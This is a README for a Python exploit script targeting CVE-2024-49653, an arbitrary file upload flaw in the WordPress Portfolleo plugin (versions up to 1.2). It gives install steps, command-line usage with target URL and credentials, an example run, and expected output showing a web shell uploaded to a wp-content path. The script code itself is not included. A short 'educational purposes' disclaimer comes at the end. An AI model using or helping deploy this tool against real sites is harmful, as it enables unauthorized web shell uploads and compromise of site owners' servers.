# 📜 WordPress Portfolleo Plugin Exploit (CVE-2024-49653)

## 🚨 Vulnerability Details


**Title:** WordPress Portfolleo plugin <= 1.2 - Arbitrary File Upload vulnerability

**Description:**  
Unrestricted Upload of File with Dangerous Type vulnerability in James Eggers Portfolleo portfolleo allows uploading a web shell to a web server. This issue affects Portfolleo from version n/a through 1.2.

**Learn More:**  
- [CWE-434: CWE-434 Unrestricted Upload of File with Dangerous Type](https://cwe.mitre.org/data/definitions/434.html)

**CVSS Score:**  
- **Score:** 9.9  
- **Severity:** CRITICAL  
- **Version:** 3.1  
- **Vector String:** CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

## 📋 User Guide

### 🚀 Script Usage

This script exploits the Arbitrary File Upload vulnerability in the WordPress Portfolleo plugin (versions <= 1.2) to upload a web shell.

### 📦 Requirements

You need to have the following installed to run the script:
- Python 3
- `requests` library
- `beautifulsoup4` library

You can install the required libraries using:
```sh
pip install requests beautifulsoup4
```

### 🛠️ Usage

Run the script with the following options:

```sh

CVE-2024-49653.py [-h] -u URL -U USERNAME -p PASSWORD

WordPress Portfolleo plugin <= 1.2 - Arbitrary File Upload vulnerability # by Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Base URL of the site (e.g. http://target/wordpress)
  -U, --username USERNAME
                        WordPress username
  -p, --password PASSWORD
                        WordPress password
```

### 📝 Example

```sh
 
python CVE-2024-49653.py -u http://target/wordpress.com -U Nxploited -p password123
```

### 📊 Expected Output

If the script runs successfully, you should see the following output:

```
[+] Logged in successfully.
[+] Extracted _wpnonce: e5f7ffa134
[+] Shell has been uploaded.
[*] Check the shell here: http://target.com/wp-content/portfolleo/nxploit.php
```

### ⚠️ Disclaimer

This script is intended for educational purposes only. The author does not condone the use of this script for illegal activities. Use it responsibly and only on systems you have explicit permission to test.

*By: Nxploited | Khaled Alenazi*
